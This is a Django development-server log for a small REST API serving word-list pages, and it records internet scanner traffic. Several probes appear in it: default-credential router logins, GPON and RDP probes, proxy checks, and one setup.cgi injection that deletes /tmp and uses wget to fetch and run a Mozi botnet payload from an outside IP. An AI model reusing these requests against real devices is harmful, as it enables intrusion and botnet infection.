Watching for file changes with StatReloader
[05/Dec/2020 18:52:51] "GET /api/vi/ddobakis/ HTTP/1.1" 200 55478
[05/Dec/2020 18:52:51] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.1" 304 0
[05/Dec/2020 18:52:51] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.1" 304 0
[05/Dec/2020 18:52:51] "GET /static/rest_framework/js/jquery-3.5.1.min.js HTTP/1.1" 304 0
[05/Dec/2020 18:52:51] "GET /static/rest_framework/js/ajax-form.js HTTP/1.1" 304 0
[05/Dec/2020 18:52:51] "GET /static/rest_framework/css/prettify.css HTTP/1.1" 304 0
[05/Dec/2020 18:52:51] "GET /static/rest_framework/css/default.css HTTP/1.1" 304 0
[05/Dec/2020 18:52:51] "GET /static/rest_framework/js/csrf.js HTTP/1.1" 304 0
[05/Dec/2020 18:52:51] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.1" 304 0
[05/Dec/2020 18:52:51] "GET /static/rest_framework/js/prettify-min.js HTTP/1.1" 304 0
[05/Dec/2020 18:52:51] "GET /static/rest_framework/js/default.js HTTP/1.1" 304 0
[05/Dec/2020 18:52:51] "GET /static/rest_framework/img/grid.png HTTP/1.1" 304 0
[05/Dec/2020 18:52:57] "GET /api/vi/ddobakis/list HTTP/1.1" 301 0
Not Found: /api/vi/ddobakis/list/
[05/Dec/2020 18:52:57] "GET /api/vi/ddobakis/list/ HTTP/1.1" 404 10581
Not Found: /api/vi/list1
[05/Dec/2020 18:53:03] "GET /api/vi/list1 HTTP/1.1" 404 6831
[05/Dec/2020 18:53:15] "GET /api/vi/wordlist1 HTTP/1.1" 301 0
[05/Dec/2020 18:53:15] "GET /api/vi/wordlist1/ HTTP/1.1" 200 9576
[05/Dec/2020 18:55:17] "GET /api/vi/wordlist3 HTTP/1.1" 301 0
[05/Dec/2020 18:55:17] "GET /api/vi/wordlist3/ HTTP/1.1" 200 10300
Not Found: /favicon.ico
[05/Dec/2020 18:55:18] "GET /favicon.ico HTTP/1.1" 404 2228
[05/Dec/2020 18:55:23] "GET /api/vi/wordlist4 HTTP/1.1" 301 0
[05/Dec/2020 18:55:23] "GET /api/vi/wordlist4/ HTTP/1.1" 200 12829
Not Found: /favicon.ico
[05/Dec/2020 18:55:23] "GET /favicon.ico HTTP/1.1" 404 2228
[05/Dec/2020 19:04:51] "GET /api/vi/wordlist1 HTTP/1.1" 301 0
[05/Dec/2020 19:04:51] "GET /api/vi/wordlist1/ HTTP/1.1" 200 9576
[05/Dec/2020 19:04:51] "GET /static/rest_framework/css/prettify.css HTTP/1.1" 200 817
[05/Dec/2020 19:04:51] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.1" 200 3385
[05/Dec/2020 19:04:51] "GET /static/rest_framework/css/default.css HTTP/1.1" 200 1131
[05/Dec/2020 19:04:51] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.1" 200 121457
[05/Dec/2020 19:04:51] "GET /static/rest_framework/js/jquery-3.5.1.min.js HTTP/1.1" 200 89476
[05/Dec/2020 19:04:51] "GET /static/rest_framework/js/ajax-form.js HTTP/1.1" 200 3597
[05/Dec/2020 19:04:51] "GET /static/rest_framework/js/csrf.js HTTP/1.1" 200 1719
[05/Dec/2020 19:04:51] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.1" 200 39680
[05/Dec/2020 19:04:51] "GET /static/rest_framework/js/prettify-min.js HTTP/1.1" 200 13632
[05/Dec/2020 19:04:51] "GET /static/rest_framework/js/default.js HTTP/1.1" 200 1268
[05/Dec/2020 19:04:51] "GET /static/rest_framework/img/grid.png HTTP/1.1" 200 1458
Not Found: /favicon.ico
[05/Dec/2020 19:04:52] "GET /favicon.ico HTTP/1.1" 404 2228
[05/Dec/2020 19:04:53] "GET /api/vi/wordlist2 HTTP/1.1" 301 0
[05/Dec/2020 19:04:53] "GET /api/vi/wordlist2/ HTTP/1.1" 200 9825
[05/Dec/2020 19:04:53] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.1" 200 121457
[05/Dec/2020 19:04:53] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.1" 200 3385
[05/Dec/2020 19:04:53] "GET /static/rest_framework/css/default.css HTTP/1.1" 200 1131
[05/Dec/2020 19:04:53] "GET /static/rest_framework/css/prettify.css HTTP/1.1" 200 817
[05/Dec/2020 19:04:53] "GET /static/rest_framework/js/ajax-form.js HTTP/1.1" 200 3597
[05/Dec/2020 19:04:53] "GET /static/rest_framework/js/jquery-3.5.1.min.js HTTP/1.1" 200 89476
[05/Dec/2020 19:04:53] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.1" 200 39680
[05/Dec/2020 19:04:53] "GET /static/rest_framework/js/csrf.js HTTP/1.1" 200 1719
[05/Dec/2020 19:04:53] "GET /static/rest_framework/js/prettify-min.js HTTP/1.1" 200 13632
[05/Dec/2020 19:04:53] "GET /static/rest_framework/js/default.js HTTP/1.1" 200 1268
[05/Dec/2020 19:04:54] "GET /static/rest_framework/img/grid.png HTTP/1.1" 200 1458
Not Found: /favicon.ico
[05/Dec/2020 19:04:54] "GET /favicon.ico HTTP/1.1" 404 2228
[05/Dec/2020 19:04:54] "GET /api/vi/wordlist3 HTTP/1.1" 301 0
[05/Dec/2020 19:04:55] "GET /api/vi/wordlist3/ HTTP/1.1" 200 10300
[05/Dec/2020 19:04:55] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.1" 200 3385
[05/Dec/2020 19:04:55] "GET /static/rest_framework/css/prettify.css HTTP/1.1" 200 817
[05/Dec/2020 19:04:55] "GET /static/rest_framework/css/default.css HTTP/1.1" 200 1131
[05/Dec/2020 19:04:55] "GET /static/rest_framework/js/ajax-form.js HTTP/1.1" 200 3597
[05/Dec/2020 19:04:55] "GET /static/rest_framework/js/jquery-3.5.1.min.js HTTP/1.1" 200 89476
[05/Dec/2020 19:04:55] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.1" 200 121457
[05/Dec/2020 19:04:55] "GET /static/rest_framework/js/csrf.js HTTP/1.1" 200 1719
[05/Dec/2020 19:04:55] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.1" 200 39680
[05/Dec/2020 19:04:55] "GET /static/rest_framework/js/prettify-min.js HTTP/1.1" 200 13632
[05/Dec/2020 19:04:55] "GET /static/rest_framework/js/default.js HTTP/1.1" 200 1268
[05/Dec/2020 19:04:55] "GET /static/rest_framework/img/grid.png HTTP/1.1" 200 1458
Not Found: /favicon.ico
[05/Dec/2020 19:04:55] "GET /favicon.ico HTTP/1.1" 404 2228
[05/Dec/2020 19:04:57] "GET /api/vi/wordlist4 HTTP/1.1" 301 0
[05/Dec/2020 19:04:57] "GET /api/vi/wordlist4/ HTTP/1.1" 200 12829
[05/Dec/2020 19:04:58] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.1" 200 3385
[05/Dec/2020 19:04:58] "GET /static/rest_framework/css/prettify.css HTTP/1.1" 200 817
[05/Dec/2020 19:04:58] "GET /static/rest_framework/css/default.css HTTP/1.1" 200 1131
[05/Dec/2020 19:04:58] "GET /static/rest_framework/js/jquery-3.5.1.min.js HTTP/1.1" 200 89476
[05/Dec/2020 19:04:58] "GET /static/rest_framework/js/ajax-form.js HTTP/1.1" 200 3597
[05/Dec/2020 19:04:58] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.1" 200 121457
[05/Dec/2020 19:04:58] "GET /static/rest_framework/js/csrf.js HTTP/1.1" 200 1719
[05/Dec/2020 19:04:58] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.1" 200 39680
[05/Dec/2020 19:04:58] "GET /static/rest_framework/js/prettify-min.js HTTP/1.1" 200 13632
[05/Dec/2020 19:04:58] "GET /static/rest_framework/js/default.js HTTP/1.1" 200 1268
[05/Dec/2020 19:04:58] "GET /static/rest_framework/img/grid.png HTTP/1.1" 200 1458
Not Found: /favicon.ico
[05/Dec/2020 19:04:58] "GET /favicon.ico HTTP/1.1" 404 2228
[05/Dec/2020 19:05:13] "GET /api/vi/wordlist4 HTTP/1.1" 301 0
[05/Dec/2020 19:05:13] "GET /api/vi/wordlist4/ HTTP/1.1" 200 12829
[05/Dec/2020 19:05:13] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.1" 200 3385
[05/Dec/2020 19:05:13] "GET /static/rest_framework/css/default.css HTTP/1.1" 200 1131
[05/Dec/2020 19:05:13] "GET /static/rest_framework/css/prettify.css HTTP/1.1" 200 817
[05/Dec/2020 19:05:13] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.1" 200 121457
[05/Dec/2020 19:05:13] "GET /static/rest_framework/js/csrf.js HTTP/1.1" 200 1719
[05/Dec/2020 19:05:13] "GET /static/rest_framework/js/ajax-form.js HTTP/1.1" 200 3597
[05/Dec/2020 19:05:13] "GET /static/rest_framework/js/jquery-3.5.1.min.js HTTP/1.1" 200 89476
[05/Dec/2020 19:05:13] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.1" 200 39680
[05/Dec/2020 19:05:13] "GET /static/rest_framework/js/prettify-min.js HTTP/1.1" 200 13632
[05/Dec/2020 19:05:13] "GET /static/rest_framework/js/default.js HTTP/1.1" 200 1268
[05/Dec/2020 19:05:13] "GET /static/rest_framework/img/grid.png HTTP/1.1" 200 1458
[05/Dec/2020 19:05:27] "GET /api/vi/ddobakis/ HTTP/1.1" 200 55478
----------------------------------------
Exception happened during processing of request from ('61.82.166.244', 53097)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
[05/Dec/2020 19:32:46] "GET /api/vi/ddobakis/ HTTP/1.1" 200 55478
[05/Dec/2020 19:32:46] "GET /static/rest_framework/css/prettify.css HTTP/1.1" 200 817
[05/Dec/2020 19:32:46] "GET /static/rest_framework/css/default.css HTTP/1.1" 200 1131
[05/Dec/2020 19:32:46] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.1" 200 3385
[05/Dec/2020 19:32:46] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.1" 200 121457
[05/Dec/2020 19:32:46] "GET /static/rest_framework/js/csrf.js HTTP/1.1" 200 1719
[05/Dec/2020 19:32:46] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.1" 200 39680
[05/Dec/2020 19:32:46] "GET /static/rest_framework/js/ajax-form.js HTTP/1.1" 200 3597
[05/Dec/2020 19:32:46] "GET /static/rest_framework/js/jquery-3.5.1.min.js HTTP/1.1" 200 89476
[05/Dec/2020 19:32:46] "GET /static/rest_framework/js/prettify-min.js HTTP/1.1" 200 13632
[05/Dec/2020 19:32:46] "GET /static/rest_framework/js/default.js HTTP/1.1" 200 1268
[05/Dec/2020 19:32:46] "GET /static/rest_framework/img/grid.png HTTP/1.1" 200 1458
[05/Dec/2020 19:39:01] "GET /api/vi/wordlist4 HTTP/1.1" 301 0
[05/Dec/2020 19:39:01] "GET /api/vi/wordlist4/ HTTP/1.1" 200 12829
[05/Dec/2020 19:39:01] "GET /static/rest_framework/css/prettify.css HTTP/1.1" 200 817
[05/Dec/2020 19:39:01] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.1" 200 3385
[05/Dec/2020 19:39:01] "GET /static/rest_framework/css/default.css HTTP/1.1" 200 1131
[05/Dec/2020 19:39:01] "GET /static/rest_framework/js/ajax-form.js HTTP/1.1" 200 3597
[05/Dec/2020 19:39:01] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.1" 200 121457
[05/Dec/2020 19:39:01] "GET /static/rest_framework/js/jquery-3.5.1.min.js HTTP/1.1" 200 89476
[05/Dec/2020 19:39:01] "GET /static/rest_framework/js/csrf.js HTTP/1.1" 200 1719
[05/Dec/2020 19:39:01] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.1" 200 39680
[05/Dec/2020 19:39:01] "GET /static/rest_framework/js/default.js HTTP/1.1" 200 1268
[05/Dec/2020 19:39:01] "GET /static/rest_framework/js/prettify-min.js HTTP/1.1" 200 13632
[05/Dec/2020 19:39:01] "GET /static/rest_framework/img/grid.png HTTP/1.1" 200 1458
Not Found: /favicon.ico
[05/Dec/2020 19:39:01] "GET /favicon.ico HTTP/1.1" 404 2228
[05/Dec/2020 19:39:03] "GET /api/vi/wordlist2 HTTP/1.1" 301 0
[05/Dec/2020 19:39:03] "GET /api/vi/wordlist2/ HTTP/1.1" 200 9825
[05/Dec/2020 19:39:03] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.1" 200 3385
[05/Dec/2020 19:39:03] "GET /static/rest_framework/css/prettify.css HTTP/1.1" 200 817
[05/Dec/2020 19:39:03] "GET /static/rest_framework/css/default.css HTTP/1.1" 200 1131
[05/Dec/2020 19:39:03] "GET /static/rest_framework/js/ajax-form.js HTTP/1.1" 200 3597
[05/Dec/2020 19:39:03] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.1" 200 121457
[05/Dec/2020 19:39:03] "GET /static/rest_framework/js/jquery-3.5.1.min.js HTTP/1.1" 200 89476
[05/Dec/2020 19:39:03] "GET /static/rest_framework/js/csrf.js HTTP/1.1" 200 1719
[05/Dec/2020 19:39:03] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.1" 200 39680
[05/Dec/2020 19:39:03] "GET /static/rest_framework/js/prettify-min.js HTTP/1.1" 200 13632
[05/Dec/2020 19:39:03] "GET /static/rest_framework/js/default.js HTTP/1.1" 200 1268
[05/Dec/2020 19:39:03] "GET /static/rest_framework/img/grid.png HTTP/1.1" 200 1458
Not Found: /favicon.ico
[05/Dec/2020 19:39:03] "GET /favicon.ico HTTP/1.1" 404 2228
Not Found: /boaform/admin/formLogin
[05/Dec/2020 19:44:56] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 2285
Not Found: /
[05/Dec/2020 22:08:43] "GET / HTTP/1.1" 404 2136
----------------------------------------
Exception happened during processing of request from ('74.120.14.56', 47734)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[05/Dec/2020 22:45:07] "GET / HTTP/1.1" 404 2136
----------------------------------------
Exception happened during processing of request from ('74.120.14.56', 41924)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[05/Dec/2020 22:45:07] "GET / HTTP/1.1" 404 2136
Not Found: /config/getuser
[06/Dec/2020 00:57:41] "GET /config/getuser?index=0 HTTP/1.1" 404 2204
[06/Dec/2020 03:55:58] code 400, message Bad request syntax ('\x05\x01\x00')
[06/Dec/2020 03:55:58] " " 400 -
[06/Dec/2020 03:56:03] code 400, message Bad request syntax ('\x05\x01\x00')
[06/Dec/2020 03:56:03] " " 400 -
[06/Dec/2020 03:56:09] code 400, message Bad request syntax ('\x05\x01\x00')
[06/Dec/2020 03:56:09] " " 400 -
[06/Dec/2020 03:57:06] code 400, message Bad request syntax ('\x04\x01\x00P\x05¼Òã\x00')
[06/Dec/2020 03:57:06] " P¼Òã " 400 -
[06/Dec/2020 03:57:13] code 400, message Bad request syntax ('\x04\x01\x00P\x05¼Òã\x00')
[06/Dec/2020 03:57:13] " P¼Òã " 400 -
[06/Dec/2020 03:57:19] code 400, message Bad request syntax ('\x04\x01\x00P\x05¼Òã\x00')
[06/Dec/2020 03:57:19] " P¼Òã " 400 -
Not Found: /http:/5.188.210.227/echo.php
[06/Dec/2020 03:58:01] "GET http://5.188.210.227/echo.php HTTP/1.1" 404 1697
Not Found: /config/getuser
[06/Dec/2020 05:13:01] "GET /config/getuser?index=0 HTTP/1.1" 404 2204
----------------------------------------
Exception happened during processing of request from ('162.142.125.54', 41344)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[06/Dec/2020 05:24:20] "GET / HTTP/1.1" 404 2136
----------------------------------------
Exception happened during processing of request from ('162.142.125.54', 40188)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[06/Dec/2020 05:24:20] "GET / HTTP/1.1" 404 2136
Not Found: /boaform/admin/formLogin
[06/Dec/2020 05:53:29] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 2289
Not Found: /actuator/health
[06/Dec/2020 06:10:11] "GET /actuator/health HTTP/1.1" 404 2199
Not Found: /
[06/Dec/2020 06:51:03] "GET / HTTP/1.0" 404 2173
Not Found: /
[06/Dec/2020 10:43:38] "GET / HTTP/1.1" 404 2136
----------------------------------------
Exception happened during processing of request from ('167.248.133.37', 44604)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 172, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[06/Dec/2020 12:11:42] "GET / HTTP/1.1" 404 2136
----------------------------------------
Exception happened during processing of request from ('167.248.133.37', 37896)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /
[06/Dec/2020 12:11:42] "GET / HTTP/1.1" 404 2136
[06/Dec/2020 16:03:53] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[06/Dec/2020 16:03:53] "  /*à     Cookie: mstshash=Administr" 400 -
Not Found: /hudson
[06/Dec/2020 16:09:32] "GET /hudson HTTP/1.1" 404 2172
Not Found: /www.origin.com:443
[06/Dec/2020 16:43:58] "CONNECT www.origin.com:443 HTTP/1.0" 404 1709
[06/Dec/2020 17:32:54] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[06/Dec/2020 17:32:54] "  /*à     Cookie: mstshash=Administr" 400 -
Not Found: /GponForm/diag_Form
[06/Dec/2020 17:39:08] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 2215
----------------------------------------
Exception happened during processing of request from ('27.216.136.52', 58545)
Traceback (most recent call last):
  File "/usr/lib/python3.6/socketserver.py", line 654, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.6/socketserver.py", line 364, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.6/socketserver.py", line 724, in __init__
    self.handle()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 174, in handle
    self.handle_one_request()
  File "/home/ubuntu/rest_env/lib/python3.6/site-packages/django/core/servers/basehttp.py", line 182, in handle_one_request
    self.raw_requestline = self.rfile.readline(65537)
  File "/usr/lib/python3.6/socket.py", line 586, in readinto
    return self._sock.recv_into(b)
ConnectionResetError: [Errno 104] Connection reset by peer
----------------------------------------
Not Found: /config/getuser
[06/Dec/2020 18:00:40] "GET /config/getuser?index=0 HTTP/1.1" 404 2204
[06/Dec/2020 18:53:34] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[06/Dec/2020 18:53:34] "  /*à     Cookie: mstshash=Administr" 400 -
[06/Dec/2020 20:09:37] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[06/Dec/2020 20:09:37] "  /*à     Cookie: mstshash=Administr" 400 -
Not Found: /
[06/Dec/2020 21:39:47] "GET / HTTP/1.0" 404 2136
Invalid HTTP_HOST header: ''. The domain name provided is not valid according to RFC 1034/1035.
Bad Request: /manager/html
[06/Dec/2020 21:46:45] "GET /manager/html HTTP/1.1" 400 61530
[06/Dec/2020 22:51:25] "GET /api/vi/wordlist1 HTTP/1.1" 301 0
[06/Dec/2020 22:51:25] "GET /api/vi/wordlist1/ HTTP/1.1" 200 9576
[06/Dec/2020 22:51:25] "GET /static/rest_framework/css/bootstrap-tweaks.css HTTP/1.1" 200 3385
[06/Dec/2020 22:51:25] "GET /static/rest_framework/css/prettify.css HTTP/1.1" 200 817
[06/Dec/2020 22:51:25] "GET /static/rest_framework/css/default.css HTTP/1.1" 200 1131
[06/Dec/2020 22:51:25] "GET /static/rest_framework/js/ajax-form.js HTTP/1.1" 200 3597
[06/Dec/2020 22:51:25] "GET /static/rest_framework/js/jquery-3.5.1.min.js HTTP/1.1" 200 89476
[06/Dec/2020 22:51:25] "GET /static/rest_framework/css/bootstrap.min.css HTTP/1.1" 200 121457
[06/Dec/2020 22:51:25] "GET /static/rest_framework/js/prettify-min.js HTTP/1.1" 200 13632
[06/Dec/2020 22:51:25] "GET /static/rest_framework/js/csrf.js HTTP/1.1" 200 1719
[06/Dec/2020 22:51:25] "GET /static/rest_framework/js/default.js HTTP/1.1" 200 1268
[06/Dec/2020 22:51:25] "GET /static/rest_framework/js/bootstrap.min.js HTTP/1.1" 200 39680
[06/Dec/2020 22:51:25] "GET /static/rest_framework/img/grid.png HTTP/1.1" 200 1458
Not Found: /favicon.ico
[06/Dec/2020 22:51:25] "GET /favicon.ico HTTP/1.1" 404 2228
[06/Dec/2020 22:51:35] "GET /api/vi/ddobakis/ HTTP/1.1" 200 55478
Not Found: /favicon.ico
[06/Dec/2020 22:51:35] "GET /favicon.ico HTTP/1.1" 404 2228
[06/Dec/2020 22:51:41] "GET /api/vi/wordlist2 HTTP/1.1" 301 0
[06/Dec/2020 22:51:41] "GET /api/vi/wordlist2/ HTTP/1.1" 200 9825
Not Found: /favicon.ico
[06/Dec/2020 22:51:41] "GET /favicon.ico HTTP/1.1" 404 2228
[06/Dec/2020 22:51:43] "GET /api/vi/wordlist3 HTTP/1.1" 301 0
[06/Dec/2020 22:51:43] "GET /api/vi/wordlist3/ HTTP/1.1" 200 10300
Not Found: /favicon.ico
[06/Dec/2020 22:51:43] "GET /favicon.ico HTTP/1.1" 404 2228
[06/Dec/2020 22:51:47] "GET /api/vi/wordlist4 HTTP/1.1" 301 0
[06/Dec/2020 22:51:47] "GET /api/vi/wordlist4/ HTTP/1.1" 200 12829
Not Found: /favicon.ico
[06/Dec/2020 22:51:47] "GET /favicon.ico HTTP/1.1" 404 2228
Not Found: /
[07/Dec/2020 02:25:08] "GET / HTTP/1.1" 404 2131
Not Found: /logs
[07/Dec/2020 02:56:01] "GET /logs HTTP/1.0" 404 2166
Not Found: /editConfig
[07/Dec/2020 02:56:01] "GET /editConfig?returnUrl=/ HTTP/1.0" 404 2196
Not Found: /config/getuser
[07/Dec/2020 04:22:41] "GET /config/getuser?index=0 HTTP/1.1" 404 2204
Not Found: /
[07/Dec/2020 06:14:22] "GET / HTTP/1.0" 404 2173
Not Found: /actuator/health
[07/Dec/2020 06:34:13] "GET /actuator/health HTTP/1.1" 404 2199
Not Found: /http:/www.eliteproxyswitcher.com/proxyjudge.html
[07/Dec/2020 08:09:11] "GET http://www.eliteproxyswitcher.com/proxyjudge.html HTTP/1.1" 404 1770
Not Found: /maktoob.yahoo.com:443
[07/Dec/2020 09:05:00] "CONNECT maktoob.yahoo.com:443 HTTP/1.1" 404 1682
Not Found: /
[07/Dec/2020 09:29:46] "GET / HTTP/1.1" 404 2136
Not Found: /
[07/Dec/2020 09:48:15] "GET / HTTP/1.1" 404 2136
Not Found: /setup.cgi
[07/Dec/2020 10:14:50] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://42.235.176.132:59711/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 2384
Not Found: /
[07/Dec/2020 10:15:38] "GET / HTTP/1.1" 404 2136
Not Found: /authserver.mojang.com:443
[07/Dec/2020 11:02:47] "CONNECT authserver.mojang.com:443 HTTP/1.0" 404 1730
Not Found: /authserver.mojang.com:443
[07/Dec/2020 11:05:44] "CONNECT authserver.mojang.com:443 HTTP/1.0" 404 1730
Not Found: /authserver.mojang.com:443
[07/Dec/2020 11:06:23] "CONNECT authserver.mojang.com:443 HTTP/1.0" 404 1730
Not Found: /authserver.mojang.com:443
[07/Dec/2020 11:06:41] "CONNECT authserver.mojang.com:443 HTTP/1.0" 404 1730
Not Found: /authserver.mojang.com:443
[07/Dec/2020 11:09:21] "CONNECT authserver.mojang.com:443 HTTP/1.0" 404 1730
Not Found: /authserver.mojang.com:443
[07/Dec/2020 11:10:21] "CONNECT authserver.mojang.com:443 HTTP/1.0" 404 1730
Not Found: /
[07/Dec/2020 14:51:35] "GET / HTTP/1.1" 404 2131
Not Found: /favicon.ico
[07/Dec/2020 14:51:36] "GET /favicon.ico HTTP/1.1" 404 2187
Not Found: /
[07/Dec/2020 14:51:41] "GET / HTTP/1.1" 404 2136
Not Found: /hudson
[07/Dec/2020 16:50:42] "GET /hudson HTTP/1.1" 404 2172
Not Found: /login
[07/Dec/2020 17:45:26] "GET /login HTTP/1.1" 404 2169
[07/Dec/2020 18:03:19] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[07/Dec/2020 18:03:19] "  /*à     Cookie: mstshash=Administr" 400 -
[07/Dec/2020 20:43:07] code 400, message Bad HTTP/0.9 request type ('\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie:')
[07/Dec/2020 20:43:07] "  /*à     Cookie: mstshash=Administr" 400 -
Not Found: /boaform/admin/formLogin
[07/Dec/2020 21:18:12] "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" 404 2287
